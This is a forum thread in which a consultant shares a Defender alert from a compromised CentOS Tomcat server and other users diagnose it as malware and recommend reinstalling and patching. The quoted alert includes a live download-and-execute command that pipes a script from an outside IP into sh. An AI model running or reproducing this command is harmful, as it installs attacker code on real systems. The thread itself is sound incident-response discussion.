Suspicious process executed by a network service

[toranv]

Hello community members,

I am an Azure consultant and I have a customer who is getting high severity "Suspicious process executed by a network service" Microsoft defender for cloud alert.

Environment: The customer has an Apache Tomcat webserver running on CentOS 7.9

When we have downloaded the Defender report as follows:

[7402] java -Djava.util.logging.config.file=/opt/tomcat/conf/logging.properties -Djava.util.logging.manager=org.apache.juli.ClassLoaderLogManager -Djava.security.egd=file:///dev/urandom -Djava.awt.headless=true -Djdk.tls.ephemeralDHKeySize=2048 -Djava.protocol.handler.pkgs=org.apache.catalina.webresources -Dorg.apache.catalina.security.SecurityListener.UMASK=0027 -Xms512M -Xmx1024M -server -XX:+UseParallelGC -Dignore.endorsed.dirs= -classpath /opt/tomcat/bin/bootstrap.jar:/opt/tomcat/bin/tomcat-juli.jar -Dcatalina.base=/opt/tomcat -Dcatalina.home=/opt/tomcat -Djava.io.tmpdir=/opt/tomcat/temp org.apache.catalina.startup.Bootstrap start
Command line /usr/lib/jvm/java-1.8.0-openjdk-1.8.0.372.b07-1.el7_9.x86_64/jre//bin/java -Djava.util.logging.config.file=/opt/tomcat/conf/logging.properties -Djava.util.logging.manager=org.apache.juli.ClassLoaderLogManager -Djava.security.egd=file:///dev/urandom -Djava.awt.headless=true -Djdk.tls.ephemeralDHKeySize=2048 -Djava.protocol.handler.pkgs=org.apache.catalina.webresources -Dorg.apache.catalina.security.SecurityListener.UMASK=0027 -Xms512M -Xmx1024M -server -XX:+UseParallelGC -Dignore.endorsed.dirs= -classpath /opt/tomcat/bin/bootstrap.jar:/opt/tomcat/bin/tomcat-juli.jar -Dcatalina.base=/opt/tomcat -Dcatalina.home=/opt/tomcat -Djava.io.tmpdir=/opt/tomcat/temp org.apache.catalina.startup.Bootstrap start
Process id 7402
Image file path /usr/lib/jvm/java-1.8.0-openjdk-1.8.0.372.b07-1.el7_9.x86_64/jre/bin/java
Image file SHA1 2bffb1d3d46365ca0e78f96577123814b54dbe88
Image file last modification time May 15, 2023 8:25:05 PM
Image file java
Effective user tomcat
1/6/2024 9:11:14 PM
[7402] bash /bin/sh -c "cd / ;curl -fsSL http://222.108.161.27:7070/docs/da.txt |sh"
Command line /bin/sh -c "cd / ;curl -fsSL http://222.108.161.27:7070/docs/da.txt |sh"
Process id 7402
Image file path /usr/bin/bash
Image file SHA1 9ad737cbd8bbdddc96726156dbd3bc03936bf02f
Image file last modification time Nov 24, 2021 10:03:27 PM
Mitre techniques T1505: Server Software Component, T1059: Command and Scripting Interpreter, T1059.004: Unix Shell, T1505.003: Web Shell, T1190: Exploit Public-Facing Application
Image file bash
Effective user tomcat
Referenced in commandline http://222.108.161.27:7070/docs/da.txt
Referenced in commandline 222.108.161.27


I need help to identify what is happening here? Is the process happening within the Tomcat webserver or outside the Tomcat webserver (over public ip)?

[TrevorH]

That does indeed look very suspicious. The 222 ip address is in whois as belonging to Korea Telecom and if you download the link it is fetching that is quite clearly up to no good. It's a shell script that attempts to kill a bunch of running processes and removes things from crontab then downloads something from pastebin and adds the resulting executable to crontab to run every 10 minutes. Generally, it screams "malware".

Your java version /usr/lib/jvm/java-1.8.0-openjdk-1.8.0.372.b07-1.el7_9.x86_64/jre/bin/java is out of date, current version is 1:1.8.0.392.b08-2.el7_9 though I have no idea if the older version is compromisable and the cause of this. The rpm changelog for the newer version (rpm -q --changelog java-1.8.0-openjdk-headless.x86_64) contains the following line:

- ** This tarball is embargoed until 2023-10-17 @ 1pm PT. **

which implies that the release was to fix an embargoed security vulnerability. There was another security update in 1.8.0.382.b05-1 which is also not on your system.

I'd say at this point your system is probably hopelessly compromised and you should reinstall from scratch to make sure there are no malware components.

[toranv]

Hi @TrevorH,

Thank you for this information.

Is there any way to remove Malware from this machine (CentOS) instead of reinstalling it from scratch? And how to protect the system from Malware in the future?

[jlehtone]

Is there any way to remove Malware from this machine (CentOS) instead of reinstalling it from scratch?

You don't know which system files have been modified, so you must assume that all the tools that you would use to inspect the system have been modified to hide the fact that there are modified system files. Therefore the clean install is the only option.


A system has essentially three parts:
* Installed system files
* Configuration
* User data

There are now configuration management systems, like Ansible, for which you describe
the desired configuration, and the tool sets up the system according to the description.
The list of installed system files, the list of installed packages is essentially configuration too.

A good part is that the description can be stored and updated outside of the managed system.
That way it is available for easy install of "new" systems.

One should always have valid backups of the user data.

[TrevorH]

Is there any way to remove Malware from this machine (CentOS) instead of reinstalling it from scratch? And how to protect the system from Malware in the future?

Once a system is coimpromised you have no idea what the attackers have done to it or what backdoors tehy have installed to regain access if you attempt to clean up. You could play whack-a-mole with them and attempt to get rid of them but ultimately you cannot trust the system any more so a reinstall is by far the best and most secure thing to do.

Keep the system up to date. The version of java there is coming on for a year old which means you're not running yum update on a regular basis or keeping an eye on the security updates that are released.